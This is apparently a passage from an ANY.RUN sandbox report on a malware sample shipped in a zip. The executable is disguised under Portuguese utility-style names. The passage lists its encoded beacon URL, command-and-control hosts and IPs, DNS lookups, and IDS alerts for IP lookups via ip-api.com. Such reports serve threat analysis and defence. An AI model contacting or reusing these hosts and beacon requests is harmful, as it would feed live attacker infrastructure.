http://54.94.102.59:157/TWX*VU,TT%25WV@@PX*)Q*PU)@S*PV,WT,GWWCUC,GQPP$GTXXGUVPS$QUCQ,VGU$ST@QC,UU$,PTG),UC)CSC%25C%25C%25)TPV@VP$PQX$*V),SQV*QTGSG$)GGW**QVX$WX,%25PXWTSX*G@V,,)XGXUUP$WUTW*UVCSVX*PXQQPC*GC*)TWSW,QXXTCT**)U%25@GV*$SQU$,SV,)S$,XX@XUXQU,PVPU$QGV,PQ%25$%25WU*QVW)@),TCG,$TT)W@GX%25WVT@%25V%25@WVQ)VUW$XUC$SU)P$),G@%25WVS),XCSU)@SW$%25QQC@SS@%25GQG)X@G*,@X)U$C%25*%25UW$WSS$UT)WVV@,PQ*@,S@C,)$%25CUU$SQX)WQ)PWCP,UGQCP@C)@SSC%25VTSVCX,%25QS*GXTXXWQ%25,SPCQCQ%25$TUX$W$%25VTWS)$,SW*XQ,CC)GWS**WG%25$V,@SS)),UGPP,VT,S@)*SXC@@S$,G*GU*VQG,WQ,,)T$%25V*WTV%25PQGCQG%25C@C%25*@X@GGGS**GXPP$XXGX))GGXCP**T*%25@SC%25TQ@%25VQ,C,WUV$,)T)%25%25@PV),WXWTQW*@*XTXWGXS)C@*CVG,WQ,PV*SV*PQ,XQ$,$PX*XGT,WQQP@%25)UCC)C%25C$,@W*WCXXXGW%25@WWXU,C$*%25XTWC*%25TT)XTSWG*XTWSG,,GW,QQW@CST,QTGTQX*X%25WX%25TU@,GQ$P,C,)*UWP))Q*)QPP)C,@GPCSVC,W*$SVCPP$)XWV),TTQXVT$%25WQX,%25X*VU@T*SUCPGCG,UQWC*WUWXT,Q%25$PXGW)GW*)SQ$PT%25)GV*XUX*%25%25WTT)@)G@@UG,*WUT,PWUWST@WU*SU*%25X%25X%25TSX,UTP%25Q%25USC*QVPW@%25CG*@WPUV*@XPG$QX@$@GPVC)*GGGC%25QXGU%25,QQX$G%25PGCT)C@G@S,GTQG)W%25,PUQ*QV,,S%25QCQC)SSC)CXG@%25TS$PQ%25PUS$VXUXSG@**T*VQ$GS,$USWCC,UTVU)C*)UV@%25$UT$@W)G)%25VT%25SUCP@V@@%25XQ*@*V%25C)@S@WVG@T@WC@@*%25,ST@QC)G%25P*@TVV%25)SG)SVS**TQSCPWC)V),USWT,)W)$XXWWU$%25)S)CUCXP$CSC%25@*X@VV$VTVXQTPQQ,*WCVQ)@Q**VQW@)*)WS@S$VU@$*S@CCSW$TGGWUG,PS@W$PGW*@G,S,C*VGGCSW$GUU@UW*C))S))@C),XTWWQX,)V$GGTGX%25%25X*T*XXUU
unknown
text
50 b
unknown
584
fgaennProDriverUtilityvdqaDriverRestoreWizard.exe
GET
200
208.95.112.1:80
http://ip-api.com/json
unknown
binary
289 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
224.0.0.252:5355
unknown
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
208.95.112.1:80
ip-api.com
TUT-AS
US
unknown
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
54.94.102.59:9479
mellforsellss.pointto.us
AMAZON-02
BR
unknown
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
54.94.102.59:30819
mellforsellss.pointto.us
AMAZON-02
BR
unknown
764
msedge.exe
239.255.255.250:1900
whitelisted
2248
msedge.exe
13.107.42.16:443
config.edge.skype.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2248
msedge.exe
204.79.197.239:443
edge.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
54.94.102.59:157
mellforsellss.pointto.us
AMAZON-02
BR
unknown

DNS requests

Domain
IP
Reputation
ip-api.com
  • 208.95.112.1
shared
mellforsellss.pointto.us
  • 54.94.102.59
unknown
config.edge.skype.com
  • 13.107.42.16
whitelisted
edge.microsoft.com
  • 204.79.197.239
  • 13.107.21.239
whitelisted
www.bing.com
  • 2.16.100.43
  • 2.16.100.34
  • 2.16.101.105
  • 2.16.100.27
  • 2.16.100.24
  • 2.16.101.120
  • 2.16.100.35
  • 2.16.100.17
  • 2.16.101.113
whitelisted
msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
  • 152.199.21.175
whitelisted
self.events.data.microsoft.com
  • 20.189.173.11
whitelisted
wojgmeojoammdlgfa.hosthampster.com
  • 54.233.106.185
unknown
mjolqjmdgalmdlgfa.hosthampster.com
  • 158.247.7.206
unknown
maejgomdmmdlgfa.buyshouses.net
  • 15.229.111.58
unknown

Threats

PID
Process
Class
Message
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
Potential Corporate Privacy Violation
AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
Potential Corporate Privacy Violation
AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
Potential Corporate Privacy Violation
AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
Potential Corporate Privacy Violation
AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
Potential Corporate Privacy Violation
AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
2208
UtilidadNecessPPDKlxlhGUPBAYLFcrcbezgdRPTB.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
MercadFinancEQEFoopnGVRKXRHTqobyXVMLovbg.zip